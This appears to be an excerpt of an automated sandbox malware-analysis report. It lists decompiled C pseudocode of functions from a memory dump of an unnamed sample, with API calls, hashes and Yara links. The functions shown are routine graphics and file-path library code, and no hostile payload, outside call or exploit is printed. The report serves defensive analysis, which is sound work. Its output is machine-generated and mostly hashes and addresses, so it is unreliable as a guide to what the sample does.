      Function 009BB072 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E009BB072(void* __ecx) {
				int _t3;
				void* _t5;
				void* _t7;

				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t3 = DeleteObject(E009BB046(_t5, __ecx, _t7)); // executed
					return _t3;
				} else {
					return 0;
				}
			}






      0x009bb076
      0x009bb081
      0x009bb087
      0x009bb078
      0x009bb07a
      0x009bb07a

      APIs
      • DeleteObject.GDI32(00000000), ref: 009BB081
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: DeleteObject
      • String ID:
      • API String ID: 1531683806-0
      • Opcode ID: 40cc3f995d0e0193f8460713920060afc4d66c1b1837eed0357e7cddd734101e
      • Instruction ID: 96d2e6cac32d5b92494cd9fd1c9630fc4685666da9d11a119cd45be4bec0ce4a
      • Opcode Fuzzy Hash: 40cc3f995d0e0193f8460713920060afc4d66c1b1837eed0357e7cddd734101e
      • Instruction Fuzzy Hash: EAB09270802100AACE20BB708A4877B77685B80326F008898A025C1099EBB9C0868500
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AB4097 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • RtlEncodePointer.NTDLL(00000000,00AC0492,00D13BB8,00000314,00000000,?,?,?,?,?,00AB674F,00D13BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00AB4099
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: 6d090473fa8bc78d68b9a6dcbc272968f2b2be4f128a35dbab8f8cb2f67999ae
      • Instruction ID: 1c0e0778a53d6f441d37578345e0dade8d5af842cb2403fd2ad7861e4376146a
      • Opcode Fuzzy Hash: 6d090473fa8bc78d68b9a6dcbc272968f2b2be4f128a35dbab8f8cb2f67999ae
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 00A539D2 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 340COMMONCrypto
      Download Yara Rule
      C-Code - Quality: 87%
      			E00A539D2(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
				void* _t140;
				int _t143;
				intOrPtr _t145;
				struct HDC__* _t146;
				signed int _t148;
				intOrPtr _t152;
				void* _t156;
				intOrPtr _t160;
				struct HDC__* _t161;
				unsigned int _t163;
				signed int _t165;
				intOrPtr _t168;
				signed int _t176;
				int _t177;
				signed int _t180;
				int _t183;
				signed int _t186;
				int _t187;
				signed char _t190;
				signed int _t194;
				signed int _t196;
				signed int _t200;
				signed char _t205;
				signed int _t207;
				signed char _t208;
				void* _t214;
				void* _t219;
				void* _t224;
				int _t231;
				unsigned int _t232;
				int _t235;
				int _t237;
				int _t239;
				signed int _t241;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				signed char _t266;
				intOrPtr _t285;
				int _t289;
				void* _t291;
				signed long long* _t292;
				signed long long _t299;

				_t299 = __fp0;
				_t279 = __edx;
				_push(0x48);
				E00AAD232(0xacfa2a, __ebx, __edi, __esi);
				_t285 = __ecx;
				 *((intOrPtr*)(_t291 - 0x50)) = __ecx;
				if( *(_t291 + 0x18) == 0x64) {
					L59:
					_t140 = 1;
				} else {
					_t143 =  *((intOrPtr*)(_t291 + 0x14)) -  *(_t291 + 0xc);
					_t231 = 0;
					 *(_t291 - 0x18) = _t143;
					if(_t143 <= 0) {
						goto L59;
					} else {
						_t289 =  *((intOrPtr*)(_t291 + 0x10)) -  *(_t291 + 8);
						 *(_t291 - 0x54) = _t289;
						if(_t289 <= 0) {
							goto L59;
						} else {
							if( *0xd0ff5c > 8) {
								__eflags =  *(_t291 + 0x24) - 0xffffffff;
								if( *(_t291 + 0x24) == 0xffffffff) {
									L8:
									E009BA639(_t291 - 0x40);
									_t145 =  *((intOrPtr*)(_t285 + 4));
									 *(_t291 - 4) = _t231;
									__eflags = _t145 - _t231;
									if(_t145 != _t231) {
										_t146 =  *(_t145 + 4);
									} else {
										_t146 = 0;
									}
									_t148 = E009BAD44(_t231, _t291 - 0x40, _t279, _t285, CreateCompatibleDC(_t146));
									__eflags = _t148;
									if(_t148 != 0) {
										 *(_t291 - 0x20) = _t231;
										 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
										 *(_t291 - 4) = 1;
										__eflags = E009BB018(_t231, _t291 - 0x24, _t279, _t285, CreateCompatibleBitmap( *( *((intOrPtr*)(_t285 + 4)) + 4), _t289,  *(_t291 - 0x18)));
										if(__eflags != 0) {
											_t152 = E009BB0A9( *(_t291 - 0x3c),  *(_t291 - 0x20));
											__eflags = _t152 - _t231;
											_t247 = 0 | __eflags != 0x00000000;
											 *((intOrPtr*)(_t291 - 0x4c)) = _t152;
											if(__eflags == 0) {
												E009B8782(_t247);
											}
											 *(_t291 - 0x44) =  *(_t291 - 0x18);
											 *(_t291 - 0x48) = _t289;
											_t156 = E00A52BF6(_t291 - 0x48, _t291 - 0x10);
											 *(_t291 - 0x44) = _t156;
											__eflags = _t156 - _t231;
											if(__eflags == 0) {
												goto L14;
											} else {
												__eflags =  *(_t291 - 0x10) - _t231;
												if(__eflags == 0) {
													goto L14;
												} else {
													SelectObject( *(_t291 - 0x3c), _t156);
													_t160 =  *((intOrPtr*)(_t285 + 4));
													__eflags = _t160 - _t231;
													if(_t160 != _t231) {
														_t161 =  *(_t160 + 4);
													} else {
														_t161 = 0;
													}
													BitBlt( *(_t291 - 0x3c), _t231, _t231, _t289,  *(_t291 - 0x18), _t161,  *(_t291 + 8),  *(_t291 + 0xc), "singapore");
													_t163 =  *(_t291 + 0x1c);
													__eflags = _t163 - 0xffffffff;
													if(_t163 != 0xffffffff) {
														_t279 = (_t163 & 0x000000ff) << 8;
														_t253 = (_t163 >> 0x00000008 & 0x000000ff | (_t163 & 0x000000ff) << 0x00000008) << 0x00000008 | _t163 >> 0x00000010 & 0x000000ff;
														__eflags = _t253;
														 *(_t291 + 0x1c) = _t253;
													}
													_t165 =  *(_t291 - 0x18) * _t289;
													__eflags = _t165 - _t231;
													if(_t165 > _t231) {
														 *(_t291 - 0x2c) = _t165;
														do {
															__eflags =  *(_t291 + 0x20);
															_t232 =  *( *(_t291 - 0x10));
															if( *(_t291 + 0x20) <= 0) {
																_t232 -  *(_t291 + 0x1c) = _t232 !=  *(_t291 + 0x1c);
																if(_t232 !=  *(_t291 + 0x1c)) {
																	goto L32;
																}
															} else {
																_t214 = E00AAFF44(_t279, (_t232 & 0x000000ff) - ( *(_t291 + 0x1c) & 0x000000ff));
																_pop(_t253);
																__eflags = _t214 -  *(_t291 + 0x20);
																if(_t214 >=  *(_t291 + 0x20)) {
																	L32:
																	__eflags =  *(_t291 + 0x18) - 0xffffffff;
																	if( *(_t291 + 0x18) != 0xffffffff) {
																		__eflags =  *(_t291 + 0x24) - 0xffffffff;
																		if( *(_t291 + 0x24) != 0xffffffff) {
																			_t176 = _t232 & 0x000000ff;
																			 *(_t291 - 0x28) = _t232 >> 0x00000008 & 0x000000ff;
																			 *(_t291 - 0x14) = _t232 >> 0x00000010 & 0x000000ff;
																			_t235 = ( *(_t291 + 0x24) >> 0x00000010 & 0x000000ff) - _t176;
																			 *(_t291 - 0x1c) = _t176;
																			_t177 = MulDiv(_t235,  *(_t291 + 0x18), 0x64);
																			__eflags = _t177 +  *(_t291 - 0x1c) - 0xff;
																			if(_t177 +  *(_t291 - 0x1c) <= 0xff) {
																				_t180 = MulDiv(_t235,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x1c);
																				__eflags = _t180;
																				 *(_t291 - 0x30) = _t180;
																			} else {
																				 *(_t291 - 0x30) = 0xff;
																			}
																			_t237 = ( *(_t291 + 0x24) >> 0x00000008 & 0x000000ff) -  *(_t291 - 0x28);
																			_t183 = MulDiv(_t237,  *(_t291 + 0x18), 0x64);
																			__eflags = _t183 +  *(_t291 - 0x28) - 0xff;
																			if(_t183 +  *(_t291 - 0x28) <= 0xff) {
																				_t186 = MulDiv(_t237,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x28);
																				__eflags = _t186;
																				 *(_t291 - 0x1c) = _t186;
																			} else {
																				 *(_t291 - 0x1c) = 0xff;
																			}
																			_t239 = ( *(_t291 + 0x24) & 0x000000ff) -  *(_t291 - 0x14);
																			_t187 = MulDiv(_t239,  *(_t291 + 0x18), 0x64);
																			__eflags = _t187 +  *(_t291 - 0x14) - 0xff;
																			if(_t187 +  *(_t291 - 0x14) <= 0xff) {
																				_t190 = MulDiv(_t239,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x14);
																				__eflags = _t190;
																			} else {
																				_t190 = 0xff;
																			}
																			_t194 = (_t190 & 0x000000ff | 0xffffff00) << 0x00000008 |  *(_t291 - 0x1c) & 0x000000ff;
																			__eflags = _t194;
																			_t261 =  *(_t291 - 0x30) & 0x000000ff;
																			goto L52;
																		} else {
																			asm("fild dword [ebp+0x18]");
																			_t292 = _t292 - 0x18;
																			_t299 = _t299 *  *0xae8828;
																			asm("fst qword [esp+0x10]");
																			asm("fst qword [esp+0x8]");
																			 *_t292 = _t299;
																			_push(_t232);
																			_t196 = E00A52D86(_t253) | 0xff000000;
																		}
																	} else {
																		asm("cdq");
																		_t263 = 3;
																		_t200 = (( *0xd0fdce & 0x000000ff) + (_t232 & 0x000000ff) * 2) / _t263;
																		 *(_t291 - 0x14) = 0xff;
																		__eflags = _t200 - 0xff;
																		if(_t200 <= 0xff) {
																			 *(_t291 - 0x14) = _t200;
																		}
																		asm("cdq");
																		_t265 = 3;
																		_t205 = (( *0xd0fdcd & 0x000000ff) + (_t232 >> 0x00000008 & 0x000000ff) * 2) / _t265;
																		_t266 = 0xff;
																		__eflags = _t205 - 0xff;
																		if(_t205 <= 0xff) {
																			_t266 = _t205;
																		}
																		_t207 = ( *0xd0fdcc & 0x000000ff) + (_t232 >> 0x00000010 & 0x000000ff) * 2;
																		asm("cdq");
																		_t241 = 3;
																		_t208 = _t207 / _t241;
																		_t279 = _t207 % _t241;
																		__eflags = _t208 - 0xff;
																		if(_t208 > 0xff) {
																			_t208 = 0xff;
																		}
																		_t194 = (_t208 & 0x000000ff | 0xffffff00) << 0x00000008 | _t266 & 0x000000ff;
																		_t261 =  *(_t291 - 0x14) & 0x000000ff;
																		L52:
																		_t196 = _t194 << 0x00000008 | _t261;
																		__eflags = _t196;
																	}
																	_t253 =  *(_t291 - 0x10);
																	 *( *(_t291 - 0x10)) = _t196;
																} else {
																	_t219 = E00AAFF44(_t279, (_t232 >> 0x00000008 & 0x000000ff) - ( *(_t291 + 0x1c) >> 0x00000008 & 0x000000ff));
																	_pop(_t253);
																	__eflags = _t219 -  *(_t291 + 0x20);
																	if(_t219 >=  *(_t291 + 0x20)) {
																		goto L32;
																	} else {
																		_t224 = E00AAFF44(_t279, (_t232 >> 0x00000010 & 0x000000ff) - ( *(_t291 + 0x1c) >> 0x00000010 & 0x000000ff));
																		_pop(_t253);
																		__eflags = _t224 -  *(_t291 + 0x20);
																		if(_t224 >=  *(_t291 + 0x20)) {
																			goto L32;
																		}
																	}
																}
															}
															 *(_t291 - 0x10) =  &(( *(_t291 - 0x10))[1]);
															_t117 = _t291 - 0x2c;
															 *_t117 =  *(_t291 - 0x2c) - 1;
															__eflags =  *_t117;
														} while ( *_t117 != 0);
														_t285 =  *((intOrPtr*)(_t291 - 0x50));
														_t289 =  *(_t291 - 0x54);
														_t231 = 0;
														__eflags = 0;
													}
													BitBlt( *( *((intOrPtr*)(_t285 + 4)) + 4),  *(_t291 + 8),  *(_t291 + 0xc), _t289,  *(_t291 - 0x18),  *(_t291 - 0x3c), _t231, _t231, "singapore");
													_t168 =  *((intOrPtr*)(_t291 - 0x4c));
													__eflags = _t168 - _t231;
													if(__eflags != 0) {
														_t231 =  *(_t168 + 4);
													}
													E009BB0A9( *(_t291 - 0x3c), _t231);
													DeleteObject( *(_t291 - 0x44));
													 *(_t291 - 4) = 0;
													 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
													E009A93B2(_t231, _t291 - 0x24, _t285, _t289, __eflags);
													_t134 = _t291 - 4;
													 *_t134 =  *(_t291 - 4) | 0xffffffff;
													__eflags =  *_t134;
													E009BADC5(_t291 - 0x40);
													goto L59;
												}
											}
										} else {
											L14:
											 *(_t291 - 4) = 0;
											 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
											E009A93B2(_t231, _t291 - 0x24, _t285, _t289, __eflags);
											goto L12;
										}
									} else {
										L12:
										 *(_t291 - 4) =  *(_t291 - 4) | 0xffffffff;
										E009BADC5(_t291 - 0x40);
										goto L7;
									}
								} else {
									__eflags =  *(_t291 + 0x18) - 0x64;
									if( *(_t291 + 0x18) <= 0x64) {
										goto L8;
									} else {
										L7:
										_t140 = 0;
									}
								}
							} else {
								E00A379BD( *((intOrPtr*)(__ecx + 4)), _t291 + 8);
								goto L59;
							}
						}
					}
				}
				return E00AAD30A(_t140);
			}














































      0x00a539d2
      0x00a539d2
      0x00a539d2
      0x00a539d9
      0x00a539e2
      0x00a539e4
      0x00a539e7
      0x00a53db0
      0x00a53db2
      0x00a539ed
      0x00a539f0
      0x00a539f3
      0x00a539f5
      0x00a539fa
      0x00000000
      0x00a53a00
      0x00a53a03
      0x00a53a06
      0x00a53a0b
      0x00000000
      0x00a53a11
      0x00a53a18
      0x00a53a2b
      0x00a53a2f
      0x00a53a3e
      0x00a53a41
      0x00a53a46
      0x00a53a49
      0x00a53a4c
      0x00a53a4e
      0x00a53a54
      0x00a53a50
      0x00a53a50
      0x00a53a50
      0x00a53a62
      0x00a53a67
      0x00a53a69
      0x00a53a79
      0x00a53a7c
      0x00a53a8d
      0x00a53aa0
      0x00a53aa2
      0x00a53abf
      0x00a53ac6
      0x00a53ac8
      0x00a53acb
      0x00a53ad0
      0x00a53ad2
      0x00a53ad2
      0x00a53ada
      0x00a53ae5
      0x00a53ae8
      0x00a53aed
      0x00a53af0
      0x00a53af2
      0x00000000
      0x00a53af4
      0x00a53af4
      0x00a53af7
      0x00000000
      0x00a53af9
      0x00a53afd
      0x00a53b03
      0x00a53b06
      0x00a53b08
      0x00a53b0e
      0x00a53b0a
      0x00a53b0a
      0x00a53b0a
      0x00a53b26
      0x00a53b2c
      0x00a53b2f
      0x00a53b32
      0x00a53b3f
      0x00a53b4d
      0x00a53b4d
      0x00a53b4f
      0x00a53b4f
      0x00a53b55
      0x00a53b58
      0x00a53b5a
      0x00a53b66
      0x00a53b6e
      0x00a53b6e
      0x00a53b75
      0x00a53b77
      0x00a53bda
      0x00a53bdc
      0x00000000
      0x00000000
      0x00a53b79
      0x00a53b83
      0x00a53b88
      0x00a53b89
      0x00a53b8c
      0x00a53be2
      0x00a53be2
      0x00a53be6
      0x00a53c5a
      0x00a53c5e
      0x00a53c8f
      0x00a53c92
      0x00a53c9b
      0x00a53cac
      0x00a53caf
      0x00a53cb2
      0x00a53cb7
      0x00a53cb9
      0x00a53cc8
      0x00a53cc8
      0x00a53ccb
      0x00a53cbb
      0x00a53cbb
      0x00a53cbb
      0x00a53cd7
      0x00a53ce0
      0x00a53ce5
      0x00a53ce7
      0x00a53cf6
      0x00a53cf6
      0x00a53cf9
      0x00a53ce9
      0x00a53ce9
      0x00a53ce9
      0x00a53d00
      0x00a53d09
      0x00a53d0e
      0x00a53d10
      0x00a53d1e
      0x00a53d1e
      0x00a53d12
      0x00a53d12
      0x00a53d12
      0x00a53d30
      0x00a53d30
      0x00a53d32
      0x00000000
      0x00a53c60
      0x00a53c60
      0x00a53c63
      0x00a53c66
      0x00a53c6c
      0x00a53c70
      0x00a53c74
      0x00a53c77
      0x00a53c7d
      0x00a53c7d
      0x00a53be8
      0x00a53bf7
      0x00a53bf8
      0x00a53bf9
      0x00a53bfb
      0x00a53bfe
      0x00a53c00
      0x00a53c02
      0x00a53c02
      0x00a53c19
      0x00a53c1a
      0x00a53c1b
      0x00a53c1d
      0x00a53c1f
      0x00a53c21
      0x00a53c23
      0x00a53c23
      0x00a53c32
      0x00a53c37
      0x00a53c38
      0x00a53c39
      0x00a53c39
      0x00a53c3b
      0x00a53c3d
      0x00a53c3f
      0x00a53c3f
      0x00a53c4f
      0x00a53c51
      0x00a53d36
      0x00a53d39
      0x00a53d39
      0x00a53d39
      0x00a53d3b
      0x00a53d3e
      0x00a53b8e
      0x00a53ba2
      0x00a53ba7
      0x00a53ba8
      0x00a53bab
      0x00000000
      0x00a53bad
      0x00a53bc1
      0x00a53bc6
      0x00a53bc7
      0x00a53bca
      0x00000000
      0x00a53bd0
      0x00a53bca
      0x00a53bab
      0x00a53b8c
      0x00a53d40
      0x00a53d44
      0x00a53d44
      0x00a53d44
      0x00a53d44
      0x00a53d4d
      0x00a53d50
      0x00a53d53
      0x00a53d53
      0x00a53d53
      0x00a53d6f
      0x00a53d75
      0x00a53d78
      0x00a53d7a
      0x00a53d7c
      0x00a53d7c
      0x00a53d83
      0x00a53d8b
      0x00a53d94
      0x00a53d98
      0x00a53d9f
      0x00a53da4
      0x00a53da4
      0x00a53da4
      0x00a53dab
      0x00000000
      0x00a53dab
      0x00a53af7
      0x00a53aa4
      0x00a53aa4
      0x00a53aa7
      0x00a53aab
      0x00a53ab2
      0x00000000
      0x00a53ab2
      0x00a53a6b
      0x00a53a6b
      0x00a53a6b
      0x00a53a72
      0x00000000
      0x00a53a72
      0x00a53a31
      0x00a53a31
      0x00a53a35
      0x00000000
      0x00a53a37
      0x00a53a37
      0x00a53a37
      0x00a53a37
      0x00a53a35
      0x00a53a1a
      0x00a53a21
      0x00000000
      0x00a53a21
      0x00a53a18
      0x00a53a0b
      0x00a539fa
      0x00a53db8

      APIs
      • __EH_prolog3.LIBCMT ref: 00A539D9
        • Part of subcall function 00A379BD: FillRect.USER32 ref: 00A379D1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: FillH_prolog3Rect
      • String ID: d$singapore
      • API String ID: 1863035756-2851686393
      • Opcode ID: b5c732a31753ed1c39c44049789de30364ba3a59c12fe97ed6b08d635b0114ba
      • Instruction ID: 587400bea589fb5e4f146720632fbd0666f38cb3c2c2b5e8edcde2f211b934ab
      • Opcode Fuzzy Hash: b5c732a31753ed1c39c44049789de30364ba3a59c12fe97ed6b08d635b0114ba
      • Instruction Fuzzy Hash: 1EC1C1729002199FCF14DFA8CD819EEBBB0FF88392F104529F951E6291C735DA59DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C8B98 Relevance: 15.1, APIs: 10, Instructions: 131filestringCOMMON
      Download Yara Rule
      C-Code - Quality: 98%
      			E009C8B98(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t45;
				long _t46;
				CHAR* _t51;
				void* _t58;
				int _t64;
				intOrPtr _t76;
				void* _t89;
				void* _t92;
				CHAR* _t94;
				long _t96;
				void* _t97;
				CHAR* _t102;
				CHAR* _t104;

				_t92 = __edx;
				_push(0x158);
				E00AAD29B(0xac9aca, __ebx, __edi, __esi);
				_t94 =  *(_t97 + 8);
				_t45 =  *(_t97 + 0xc);
				_t76 =  *((intOrPtr*)(_t97 + 0x10));
				_t102 = _t94;
				_t78 = 0 | _t102 != 0x00000000;
				 *(_t97 - 0x158) = _t45;
				if(_t102 != 0) {
					L2:
					_t104 = _t45;
					_t78 = 0 | _t104 != 0x00000000;
					if(_t104 != 0) {
						goto L1;
					}
					_t80 = _t97 - 0x15c;
					_t96 = 0x104;
					_t46 = GetFullPathNameA(_t45, 0x104, _t94, _t97 - 0x15c);
					if(_t46 != 0) {
						if(_t46 < 0x104) {
							E009A5D70(_t97 - 0x154, _t92, E009B9D52());
							 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
							E009C89F5(_t76, _t92, _t94, _t97 - 0x154);
							_t51 = PathIsUNCA( *(_t97 - 0x154));
							if(_t51 != 0) {
								L21:
								E009A5510( &(( *(_t97 - 0x154))[0xfffffffffffffff0]), _t92);
								goto L22;
							}
							if(GetVolumeInformationA( *(_t97 - 0x154), _t51, _t51, _t51, _t97 - 0x164, _t97 - 0x160, _t51, _t51) != 0) {
								if(( *(_t97 - 0x160) & 0x00000002) == 0) {
									CharUpperA(_t94);
								}
								if(( *(_t97 - 0x160) & 0x00000004) != 0) {
									goto L21;
								} else {
									_t58 = FindFirstFileA( *(_t97 - 0x158), _t97 - 0x150);
									if(_t58 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t58);
									if( *(_t97 - 0x15c) == 0 ||  *(_t97 - 0x15c) <= _t94) {
										goto L11;
									} else {
										_t64 = lstrlenA(_t97 - 0x124);
										_t89 =  *(_t97 - 0x15c) - _t94;
										if(_t64 + _t89 >= _t96) {
											if(_t76 != 0) {
												 *((intOrPtr*)(_t76 + 8)) = 3;
												E009A6000(_t92, _t94,  *(_t97 - 0x158));
											}
											L12:
											E009A5510( &(( *(_t97 - 0x154))[0xfffffffffffffff0]), _t92);
											goto L5;
										}
										E009A6677(_t89, E00AAF201( *(_t97 - 0x15c), _t96, _t97 - 0x124));
										goto L21;
									}
								}
							}
							L11:
							E009C8B69(_t92, _t94, _t76,  *(_t97 - 0x158));
							goto L12;
						}
						if(_t76 != 0) {
							 *((intOrPtr*)(_t76 + 8)) = 3;
							E009A6000(_t92, _t94,  *(_t97 - 0x158));
						}
						goto L5;
					} else {
						E009A6677(_t80, E00AAF0A3(_t94, 0x104,  *(_t97 - 0x158), 0xffffffff));
						E009C8B69(_t92, _t94, _t76,  *(_t97 - 0x158));
						L5:
						L22:
						return E00AAD31E(_t76, _t94, _t96);
					}
				}
				L1:
				_t45 = E009B8782(_t78);
				goto L2;
			}
















      0x009c8b98
      0x009c8b98
      0x009c8ba2
      0x009c8ba7
      0x009c8baa
      0x009c8bad
      0x009c8bb2
      0x009c8bb4
      0x009c8bb7
      0x009c8bbf
      0x009c8bc6
      0x009c8bc8
      0x009c8bca
      0x009c8bcf
      0x00000000
      0x00000000
      0x009c8bd1
      0x009c8bd9
      0x009c8be0
      0x009c8be8
      0x009c8c17
      0x009c8c40
      0x009c8c45
      0x009c8c51
      0x009c8c5c
      0x009c8c64
      0x009c8d2e
      0x009c8d37
      0x00000000
      0x009c8d3e
      0x009c8c8b
      0x009c8cb3
      0x009c8cb6
      0x009c8cb6
      0x009c8cc3
      0x00000000
      0x009c8cc5
      0x009c8cd2
      0x009c8cdb
      0x00000000
      0x00000000
      0x009c8cde
      0x009c8ceb
      0x00000000
      0x009c8cf5
      0x009c8cfc
      0x009c8d08
      0x009c8d0e
      0x009c8d49
      0x009c8d58
      0x009c8d5f
      0x009c8d5f
      0x009c8c99
      0x009c8ca2
      0x00000000
      0x009c8ca2
      0x009c8d26
      0x00000000
      0x009c8d2b
      0x009c8ceb
      0x009c8cc3
      0x009c8c8d
      0x009c8c94
      0x00000000
      0x009c8c94
      0x009c8c1b
      0x009c8c26
      0x009c8c2d
      0x009c8c2d
      0x00000000
      0x009c8bea
      0x009c8bfa
      0x009c8c09
      0x009c8c0e
      0x009c8d3f
      0x009c8d44
      0x009c8d44
      0x009c8be8
      0x009c8bc1
      0x009c8bc1
      0x00000000

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009C8BA2
      • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,009C8D7B,?,00000104,00000000,?,009D29EA,?,?), ref: 009C8BE0
      • __cftof.LIBCMT ref: 009C8BF4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • PathIsUNCA.SHLWAPI(?,?,?,00000000,?,009D29EA,?,?,?,?,?,?), ref: 009C8C5C
      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,009D29EA,?,?,?,?,?,?), ref: 009C8C83
      • CharUpperA.USER32(?), ref: 009C8CB6
      • FindFirstFileA.KERNEL32(?,?), ref: 009C8CD2
      • FindClose.KERNEL32(00000000), ref: 009C8CDE
      • lstrlenA.KERNEL32(?), ref: 009C8CFC
      • _strcpy_s.LIBCMT ref: 009C8D20
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume__cftof_strcpy_slstrlen
      • String ID:
      • API String ID: 4058050636-0
      • Opcode ID: f213dddb60772aa32e019754e3151cc7a48967bd3cf5f4ff591f056bfc68b681
      • Instruction ID: 9004a8f6ff7ad8be04831c5b18608f63f2d5baed8851e176a810b48e617cb516
      • Opcode Fuzzy Hash: f213dddb60772aa32e019754e3151cc7a48967bd3cf5f4ff591f056bfc68b681
      • Instruction Fuzzy Hash: A941BE71901619ABDF24AFA0CD49FEF777CAF85315F00059DB40AA6291DF308E848E61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A7B6A Relevance: 9.1, APIs: 6, Instructions: 116keyboardwindowCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
